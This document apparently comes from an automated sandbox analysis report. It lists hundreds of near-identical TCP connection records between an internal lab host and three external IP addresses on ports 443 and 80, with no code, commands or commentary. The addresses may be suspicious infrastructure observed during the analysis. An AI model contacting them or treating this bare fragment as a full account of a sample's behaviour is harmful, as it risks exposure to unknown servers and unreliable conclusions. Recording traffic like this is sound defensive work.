                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49164
